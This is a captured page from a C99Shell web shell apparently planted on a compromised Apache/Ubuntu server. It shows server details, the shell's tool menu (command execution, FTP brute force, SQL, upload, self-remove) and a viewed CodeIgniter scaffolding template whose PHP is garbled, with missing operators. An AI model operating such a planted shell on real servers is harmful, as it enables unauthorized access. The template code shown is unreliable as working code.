!C99Shell v. 2.5 [PHP 8 Update] [24.05.2025]!

Software: Apache/2.4.41 (Ubuntu). PHP/8.0.30 

uname -a: Linux apirnd 5.4.0-204-generic #224-Ubuntu SMP Thu Dec 5 13:38:28 UTC 2024 x86_64 

uid=33(www-data) gid=33(www-data) groups=33(www-data) 

Safe-mode: OFF (not secure)

/var/www/html/billing/system/scaffolding/views/   drwxr-xr-x
Free 13.05 GB of 57.97 GB (22.52%)
Home    Back    Forward    UPDIR    Refresh    Search    Buffer    Encoder    Tools    Proc.    FTP brute    Sec.    SQL    PHP-code    Update    Self remove    Logout    


Viewing file:     edit.php (934 B)      -rw-r--r--
Select action/file-type:
(+) | (+) | (+) | Code (+) | Session (+) | (+) | SDB (+) | (+) | (+) | (+) | (+) | (+) |
<?php $this->load->view('header');  ?>


<p><?php echo anchor(array($base_uri'view'), '&lt; '.$scaff_view_all);?></p>


<?php echo form_open($action); ?>

<table border="0" cellpadding="3" cellspacing="1">
<?php foreach($fields as $field): ?>

<?php if ($field->primary_key == 1) continue; ?>

<tr>
    <td><?php echo  $field->name?></td>
    
    <?php if ($field->type == 'blob'): ?>
    <td><textarea class="textarea" name="<?php echo $field->name;?>" cols="60" rows="10" ><?php $f $field->name; echo form_prep($query->$f); ?></textarea></td>
    <?php else : ?>
    <td><input class="input" value="<?php $f $field->name; echo form_prep($query->$f); ?>" name="<?php echo $field->name?>" size="60" /></td>
    <?php endif; ?>
    
</tr>
<?php endforeach; ?>
</table>

<input type="submit" class="submit" value="Update" />

</form>

<?php $this->load->view('footer'); 
/* End of file edit.php */
/* Location: ./system/scaffolding/views/edit.php */

:: Command execute ::

Enter:
 
Select:
 

:: Search ::
  - regexp 

:: Upload ::
 
[ Read-Only ]

:: Make Dir ::
 
[ Read-Only ]
:: Make File ::
 
[ Read-Only ]

:: Go Dir ::
 
:: Go File ::
 

--[ c99shell v. 2.5 [PHP 8 Update] [24.05.2025] | Generation time: 0.0115 ]--